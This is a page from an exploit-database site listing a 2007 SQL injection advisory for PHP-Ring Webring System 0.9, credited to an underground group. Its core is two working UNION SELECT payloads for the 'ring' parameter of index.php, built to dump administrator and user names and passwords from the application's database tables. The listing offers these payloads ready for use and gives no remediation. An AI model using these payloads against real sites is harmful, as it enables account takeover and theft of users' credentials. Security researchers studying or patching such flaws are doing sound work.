[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

PHP-Ring Webring System 0.9 Remote SQL Injection Vulnerability

Author
Dj7xpl
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-1785
Category
web applications
Date add
21-04-2007
Platform
unsorted
==============================================================
PHP-Ring Webring System 0.9 Remote SQL Injection Vulnerability
==============================================================



                                            Y! Underground Group


								
								
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-

Portal.......:   uPHP_ring_website
Download.....:   http://www.undoweb.frih.net , http://undoweb.frih.net/downloads/uPHP_ring_website.zip
Type.........:   Sql Injection Attack


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-

Bug..........:

index.php?ring=Sql.Inject

index.php?ring=-1/**/UNION/**/SELECT/**/0,admin_uname,admin_pass/**/FROM/**/ring_admins/*
or
index.php?ring=-1/**/UNION/**/SELECT/**/0,USER_NAME,USER_PASS,1,2,3/**/FROM/**/ring_users/*

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-



#  0day.today [2024-12-25]  #